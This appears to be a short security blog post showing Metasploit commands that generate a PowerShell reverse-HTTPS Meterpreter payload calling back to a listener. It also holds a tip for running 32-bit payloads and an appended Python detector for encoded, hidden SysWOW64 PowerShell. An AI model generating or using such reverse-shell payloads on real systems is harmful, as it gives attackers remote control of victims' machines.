Quick post, since I mentioned it in the DerbyCon talk: Metasploit can generate PowerShell and PowerShell .NET (looks related to this) payloads.
msf > use payload/windows/meterpreter/reverse_https
msf payload(reverse_https) > set LHOST 192.168.1.1
LHOST => 192.168.1.1
msf payload(reverse_https) > set LPORT 443
LPORT => 443
msf payload(reverse_https) > generate -t psh -f https-pwrshell.txt
[*] Writing 3566 bytes to https-pwrshell.txt...
msf payload(reverse_https) >
It generates the payload based on old PowerSploit code here. Also note that the 64-bit business I mentioned here still applies: on x64 Windows you need to call the PowerShell in SysWOW64 to run 32-bit payloads.
PowerShell version
PowerShell .net version
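Added here as a defender-side illustration (not part of the original post, and not Metasploit or PowerSploit code): a small Python triage over constructed process-creation events that flags the pattern the SysWOW64 caveat implies, the 32-bit PowerShell host launched from SysWOW64 together with an encoded, hidden-window command line. The Image|CommandLine|ParentImage layout, the sample lines and the reason strings are assumptions.

```python
import re

# Constructed sample process-creation events (not from the original post).
# Each line is Image|CommandLine|ParentImage, in the spirit of Sysmon Event ID 1.
SAMPLE_EVENTS = [
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -enc SQBFAFgA(...)|C:\Windows\explorer.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -File C:\scripts\backup.ps1|C:\Windows\System32\svchost.exe",
    r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -Command Get-Date|C:\Program Files (x86)\Vendor\app.exe",
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -NoProfile -WindowStyle Hidden -EncodedCommand SQBFAFgA(...)|C:\Windows\System32\cmd.exe",
]

# On an x64 Windows install the 32-bit PowerShell host lives under SysWOW64.
WOW64_PS = re.compile(r"\\SysWOW64\\WindowsPowerShell\\", re.IGNORECASE)
# PowerShell accepts unambiguous prefixes of -EncodedCommand; cover the usual ones.
ENCODED = re.compile(r"(?<!\S)-(?:e|ec|en|enc|encodedcommand)(?!\S)", re.IGNORECASE)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE)

R_WOW64 = "32-bit PowerShell launched from SysWOW64"
R_ENCODED = "encoded command line"
R_HIDDEN = "hidden window requested"


def score_event(line):
    """Return the indicators present in one Image|CommandLine|ParentImage line."""
    image, cmdline, _parent = line.split("|", 2)
    reasons = []
    if WOW64_PS.search(image):
        reasons.append(R_WOW64)
    if ENCODED.search(cmdline):
        reasons.append(R_ENCODED)
    if HIDDEN.search(cmdline):
        reasons.append(R_HIDDEN)
    return reasons


def triage(events, min_indicators=2):
    """Return (index, reasons) for events with at least min_indicators hits.
    A lone SysWOW64 hit is not enough by itself: 32-bit vendor software
    legitimately spawns the 32-bit host, so it only adds weight to other hits."""
    flagged = []
    for idx, line in enumerate(events):
        reasons = score_event(line)
        if len(reasons) >= min_indicators:
            flagged.append((idx, reasons))
    return flagged


if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(reasons)}")
```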